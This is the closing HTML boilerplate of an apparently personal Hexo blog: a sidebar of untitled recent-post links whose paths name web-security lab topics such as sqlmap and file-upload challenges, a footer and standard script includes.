          </li>
        
          <li>
            <a href="/2025/05/20/Web/%E5%B7%A5%E5%85%B7%E4%BD%BF%E7%94%A8/sqlmap/">(no title)</a>
          </li>
        
          <li>
            <a href="/2025/05/20/Web/%E7%BB%95%E8%BF%87/%E7%BB%95%E8%BF%87/">(no title)</a>
          </li>
        
          <li>
            <a href="/2025/05/20/Web/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0/upload-labs/Apache%E8%A7%A3%E6%9E%90%E6%BC%8F%E6%B4%9E+%E6%9D%A1%E4%BB%B6%E7%AB%9E%E4%BA%89/">(no title)</a>
          </li>
        
          <li>
            <a href="/2025/05/20/Web/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0/upload-labs/user.ini/">(no title)</a>
          </li>
        
      </ul>
    </div>
  </div>

  
</aside>
        
      </div>
      <footer id="footer">
  
  <div class="outer">
    <div id="footer-info" class="inner">
      
      &copy; 2025 John Doe<br>
      Powered by <a href="https://hexo.io/" target="_blank">Hexo</a>
    </div>
  </div>
</footer>

    </div>
    <nav id="mobile-nav">
  
    <a href="/" class="mobile-nav-link">Home</a>
  
    <a href="/archives" class="mobile-nav-link">Archives</a>
  
</nav>
    


<script src="/js/jquery-3.6.4.min.js"></script>



  
<script src="/fancybox/jquery.fancybox.min.js"></script>




<script src="/js/script.js"></script>





  </div>
</body>
</html>